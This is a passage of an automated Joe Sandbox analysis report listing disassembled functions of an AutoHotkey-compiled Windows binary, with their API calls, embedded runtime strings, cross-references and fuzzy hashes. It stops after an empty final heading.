Function 0043094D Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 004309E0

Strings

yes, xrefs: 00430A4C, 00430A5E, 00430AB0, 00430AB1
..., xrefs: 004309DA
Key History has been disabled via #KeyHistory 0., xrefs: 00430B09, 00430B10
%s , xrefs: 00430993
Window: %sKeybd hook: %sMouse hook: %sEnabled Timers: %u of %u (%s)Interrupted threads: %d%sPaused threads: %d of %d (%d layers)Modifiers (GetKeyState() now) = %s, xrefs: 00430ABA
Press [F5] to refresh., xrefs: 00430B02
Object, xrefs: 0043097F, 00430992

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: Key History has been disabled via #KeyHistory 0.$Press [F5] to refresh.$%s $...$Object$Window: %sKeybd hook: %sMouse hook: %sEnabled Timers: %u of %u (%s)Interrupted threads: %d%sPaused threads: %d of %d (%d layers)Modifiers (GetKeyState() now) = %s$yes
API String ID: 2961919466-712811174
Opcode ID: d5881f9bd89753e66e0e78ae75832ecf8097d862143451f87fd03bc8eb5293e7
Instruction ID: ee95e30108edd5463def7f70cdc79dc8c96c8eae0f7877eb80af216c09f75aab
Opcode Fuzzy Hash: d5881f9bd89753e66e0e78ae75832ecf8097d862143451f87fd03bc8eb5293e7
Instruction Fuzzy Hash: 3641E8B29053459FDB10DF14EC91A777BA4AB89304F08463FE88997312D32DAD4DC79A

Function 004C7DB8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(00000000,?,?,?,004C66BD), ref: 004C7E7B
__init_pointers.LIBCMT ref: 004C7E85
__mtterm.LIBCMT ref: 004C7F3B

Part of subcall function 004C7A64: TlsFree.KERNEL32(00000017,004C6752), ref: 004C7A8F

Strings

FlsFree, xrefs: 004C7E05
FlsAlloc, xrefs: 004C7DE3
KERNEL32.DLL, xrefs: 004C7DBC, 004C7DC1, 004C7DCC
FlsSetValue, xrefs: 004C7DF8
FlsGetValue, xrefs: 004C7DEB

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FreeValue__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3928193026-3819984048
Opcode ID: 1299e7a1becc4eb7ce234f9c62ba59c8832d64789783382629e2ab769c7e6107
Instruction ID: 40c9dbe047e8519e2feb02448df2ad3c68325cc1f431f8a77b2cbe0d4f7c8137
Opcode Fuzzy Hash: 1299e7a1becc4eb7ce234f9c62ba59c8832d64789783382629e2ab769c7e6107
Instruction Fuzzy Hash: FD31627980A311ABD7916B35AD4DF163BA4AB51324B10467FF40C932B1EBBCC4608EAD

Function 00404B02 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00404B0E

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

Strings

OwnerLink, xrefs: 00404B36
Embed Source, xrefs: 00404B60
MSDEVLineSelect, xrefs: 00404B8A
MSDEVColumnSelect, xrefs: 00404B75
Native, xrefs: 00404B4B
Link Source, xrefs: 00404B08
ObjectLink, xrefs: 00404B21

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign__mbsnbicmp_l
String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
API String ID: 3053643802-1844231336
Opcode ID: 190e7692b435baffbff5f34096d23c864d685d1db0770cbd08b70c25b13a56b9
Instruction ID: 81cc98ba4332171f873c605556a535e613c1b65c57eb69f4703dd80e4a3c2c27
Opcode Fuzzy Hash: 190e7692b435baffbff5f34096d23c864d685d1db0770cbd08b70c25b13a56b9
Instruction Fuzzy Hash: AB0196F0A4430112DE20F6619E42F7B3AA85F90705F984D7EAC80D12C5FBBDF914C2A9

Function 00435C50 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 413COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00435DAD
__wcstoi64.LIBCMT ref: 00435E12
GetWindowRect.USER32(?,?), ref: 00435E89
EnumChildWindows.USER32(?,Function_0003C7A0,?), ref: 00435EAA
GetWindowRect.USER32(00000000,?), ref: 00435F2D

Strings

Pos, xrefs: 00435D32

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: RectWindow$ChildEnumWindows__wcstoi64_memset
String ID: Pos
API String ID: 3020246111-3096748108
Opcode ID: 99678a8d13d096a23f537fc6f3f9fed31e47ff021676d50d4c0a10559fa2fd3d
Instruction ID: 15538eb6a7e8722e2e1fde9fde7c26d8211331e33affc41d2c67911b02b35d5c
Opcode Fuzzy Hash: 99678a8d13d096a23f537fc6f3f9fed31e47ff021676d50d4c0a10559fa2fd3d
Instruction Fuzzy Hash: 40E196715087416BE720DB248C45B6B7BE0AB89314F589A2EF8D4873C2C73DD84A8B5A

Function 0044EC40 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 0044ED3D
__wcstoi64.LIBCMT ref: 0044EDBA
__fassign.LIBCMT ref: 0044EDDF
__wcstoi64.LIBCMT ref: 0044EDFE
__fassign.LIBCMT ref: 0044EE23

Strings

Icon, xrefs: 0044EDD9
GDI+, xrefs: 0044EE1D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$__fassign
String ID: GDI+$Icon
API String ID: 3041097304-2641797909
Opcode ID: 532293667c8e97ffe7413d56bfc3793e79d5ac03f4d0770019be92022e99d391
Instruction ID: 51010046b8203124bb04bfdd138583dfa6f37e282afd5f2d1bea2f3b4fb73fbc
Opcode Fuzzy Hash: 532293667c8e97ffe7413d56bfc3793e79d5ac03f4d0770019be92022e99d391
Instruction Fuzzy Hash: 04A133B09046415FF7209F268881B6BBBE17F56304F28886FE9894B392D33D9D45C79A

Function 00439030 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 200COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043907F

Strings

Parameter #2 invalid., xrefs: 0043905B
%sLeft, xrefs: 0043916B
H, xrefs: 00439088
%sRight, xrefs: 004391D7
%sTop, xrefs: 004391A7
%sBottom, xrefs: 00439207

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: %sBottom$%sLeft$%sRight$%sTop$H$Parameter #2 invalid.
API String ID: 2102423945-1667060876
Opcode ID: 5ec1fd581577f900ae2dac2d54ee3516f706da31e7bf1731d59ff853f3a89015
Instruction ID: a587f3ad2f06e15fc6ef1191dbfd5f2c94bfb5c11294bf807826e82a1bcad72e
Opcode Fuzzy Hash: 5ec1fd581577f900ae2dac2d54ee3516f706da31e7bf1731d59ff853f3a89015
Instruction Fuzzy Hash: CC5107B23483006BD710DA559C42FAB77A8EBDC714F14852FFD48972C1D6B8DD0587AA

Function 00411860 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00411923

Part of subcall function 00489975: strtoxl.LIBCMT ref: 00489996

__wcstoi64.LIBCMT ref: 0041196F
__wcstoi64.LIBCMT ref: 004119A9
__wcstoi64.LIBCMT ref: 004119DD
__wcstoi64.LIBCMT ref: 00411A11
__wcstoi64.LIBCMT ref: 004118CB

Part of subcall function 00489456: __wcstoi64.LIBCMT ref: 0048944C

Strings

W, xrefs: 0041189E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$strtoxl
String ID: W
API String ID: 3288754983-655174618
Opcode ID: 2c6fa6437a8eae3b547038789e60b35de3c747d9509b2085c38c8486a4c6d919
Instruction ID: 4c416f858b59b51a73afd3f01ea042eaee9db1a3759fd823a77d13a049362478
Opcode Fuzzy Hash: 2c6fa6437a8eae3b547038789e60b35de3c747d9509b2085c38c8486a4c6d919
Instruction Fuzzy Hash: 6551F3B19093513BD710AB2548017AF7B945F46744F08082EFAD52B3E2E36C9D86C39F

Function 00440F5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00440F46
_strncpy.LIBCMT ref: 00440FD6
_strncpy.LIBCMT ref: 00441039
_memset.LIBCMT ref: 00441075
_strncpy.LIBCMT ref: 004410AE
__wcstoi64.LIBCMT ref: 004411A0

Strings

%s%c%s%cAll Files (*.*)%c*.*%c, xrefs: 004410F4
X, xrefs: 00441086

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy$__wcstoi64_memset
String ID: %s%c%s%cAll Files (*.*)%c*.*%c$X
API String ID: 1960159243-68800595
Opcode ID: 3ab8da681eff083606605ea76a20b1311e335e295fbe9d52649ba2f241d889f6
Instruction ID: 6ea129bc0081e130a107c4a3a54e0c431f72fb1e2ad290493787d29bd0d95b44
Opcode Fuzzy Hash: 3ab8da681eff083606605ea76a20b1311e335e295fbe9d52649ba2f241d889f6
Instruction Fuzzy Hash: 2D612770D04348AAFB30DB648C01BEF7B606F09304F18416BEA44762D2E7BD5A89CB5E

Function 0040F3D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183keyboardCOMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0040F408

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

__fassign.LIBCMT ref: 0040F436
GetAsyncKeyState.USER32(0000005B), ref: 0040F5AC
GetAsyncKeyState.USER32(0000005C), ref: 0040F5BA

Strings

{Blind}, xrefs: 0040F402
{Text}, xrefs: 0040F430
{Click, xrefs: 0040F481

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AsyncState__fassign$__mbsnbicmp_l
String ID: {Blind}${Click${Text}
API String ID: 3651278680-2355037086
Opcode ID: af73c5da3224ef1c6d8d8fa1b4b93d220d6952b16423eafb9570db5711fe2d26
Instruction ID: 3b89a04408e61b228768ce10d8389524054e22881c3eb8d172a97679536b5e11
Opcode Fuzzy Hash: af73c5da3224ef1c6d8d8fa1b4b93d220d6952b16423eafb9570db5711fe2d26
Instruction Fuzzy Hash: D751EE71900301AADB30AFA59C4176B3BA4AB51318F14453BEC55A7BD2E77CDC0ACB59

Function 0041F49C Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 171COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0041F4CE

Strings

Parameter #2 invalid., xrefs: 0041F55E, 0041F602
Fast, xrefs: 0041F4DE, 0041F58D
Parameter #1 invalid., xrefs: 0041F621
Integer, xrefs: 0041F577
Float, xrefs: 0041F4C8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign
String ID: Fast$Float$Integer$Parameter #1 invalid.$Parameter #2 invalid.
API String ID: 3965848254-2639214213
Opcode ID: f46195b5be93fac4b47b67e1a1a4e95a49a882ecc534e3b7ac57c5248d2b2471
Instruction ID: 175e8e79e212cb8665a3e3d7d8b59f08e7c30072d6c7d43508ae9d2d3ceaf752
Opcode Fuzzy Hash: f46195b5be93fac4b47b67e1a1a4e95a49a882ecc534e3b7ac57c5248d2b2471
Instruction Fuzzy Hash: 535148717043418BDB20DB15D8517E77B91AB81318F48007FE9484B3A2E7AEA8CBC79A

Function 00420A80 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 162COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00420B77

Strings

Duplicate declaration., xrefs: 00420B9F
Out of memory., xrefs: 00420C1C
%.*s.Get%s, xrefs: 00420B71
Missing "]", xrefs: 00420B19
4I, xrefs: 00420B35
Not a valid method, class or property definition., xrefs: 00420AC3

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _sprintf
String ID: %.*s.Get%s$4I$Duplicate declaration.$Missing "]"$Not a valid method, class or property definition.$Out of memory.
API String ID: 1467051239-2620013856
Opcode ID: 781981bae57e968a9c1312f68acc9644d071ee2ddb8cc3840f7a371ed643dac8
Instruction ID: a64edff16007b8c24370358888fa7ed050ded39ca8cd058fae386bc5957c75c6
Opcode Fuzzy Hash: 781981bae57e968a9c1312f68acc9644d071ee2ddb8cc3840f7a371ed643dac8
Instruction Fuzzy Hash: 9E41AC717043145FCB10AB59A801BABBFD49B92319FD4017FE98587343DA2EE84AC76D

Function 0043B910 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0043B98D
_strncpy.LIBCMT ref: 0043B9B2
_strncpy.LIBCMT ref: 0043B9D7

Strings

The maximum number of InputBoxes has been reached., xrefs: 0043B947
AutoHotkey v1.1.36.02, xrefs: 0043B97D, 0043B987

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: AutoHotkey v1.1.36.02$The maximum number of InputBoxes has been reached.
API String ID: 2961919466-4084533127
Opcode ID: f88b40caa6fe3381807f9d2315889a4d3f09ab97ccbce82aba82f2977c271409
Instruction ID: 50341976db22c264ccdce4cf9f91df00b5171f9be2209fdb6c6eba14c6545470
Opcode Fuzzy Hash: f88b40caa6fe3381807f9d2315889a4d3f09ab97ccbce82aba82f2977c271409
Instruction Fuzzy Hash: 50512970A083419FE321EB14C845BA77BE4FB8D308F54497EF6898B291D3399456CB9E

Function 004183E7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00418257
__fassign.LIBCMT ref: 004182AA
__fassign.LIBCMT ref: 0041831B
_memmove.LIBCMT ref: 0041834E
__fassign.LIBCMT ref: 004183AA
_memmove.LIBCMT ref: 0041846D
__fassign.LIBCMT ref: 00418513

Strings

#CommentFlag, xrefs: 00418296

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign$_memmove
String ID: #CommentFlag
API String ID: 3294318541-710863922
Opcode ID: 5bf74bb915738f3c8cd97af2fb3ddd30440ddcaadd06e1401ffc0d92ba57a19b
Instruction ID: 175b8fef02cf914aa71b3b7ed89e6e7d163532d883013e2412c2971d2554ccda
Opcode Fuzzy Hash: 5bf74bb915738f3c8cd97af2fb3ddd30440ddcaadd06e1401ffc0d92ba57a19b
Instruction Fuzzy Hash: E85104706083815ADB21DB2488457FFBBD5AB95308F080A5FE98457382FF7D9989C38B

Function 0040D040 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 135COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040D079
CharUpperA.USER32(00000000,?,?,?,00402126,?), ref: 0040D0B1
CharUpperA.USER32(?,?,?,?,00402126,?), ref: 0040D0C2
_sprintf.LIBCMT ref: 0040D130

Strings

{Text}, xrefs: 0040D109
%s%c, xrefs: 0040D12A
{Raw}, xrefs: 0040D0F6, 0040D125

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharUpper$_memset_sprintf
String ID: %s%c${Raw}${Text}
API String ID: 1253716677-2444501380
Opcode ID: 6aa338877a23381cd38e82786f0b91fd5473c3f61fe1a24aa6b93eed706e1257
Instruction ID: 67cbc6a208b2d3d901bc423a50dfd873fbe5eb1244de976be250b7cf64bdbbee
Opcode Fuzzy Hash: 6aa338877a23381cd38e82786f0b91fd5473c3f61fe1a24aa6b93eed706e1257
Instruction Fuzzy Hash: 9051E3B09087859ED721CF68C840767BFE0AF56304F04496EE5C997782D778E54CC7AA

Function 0045036D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

GetProcessImageFileNameA, xrefs: 004503D4
A, xrefs: 00450470
psapi, xrefs: 004503D9
:, xrefs: 00450469

Memory Dump Source

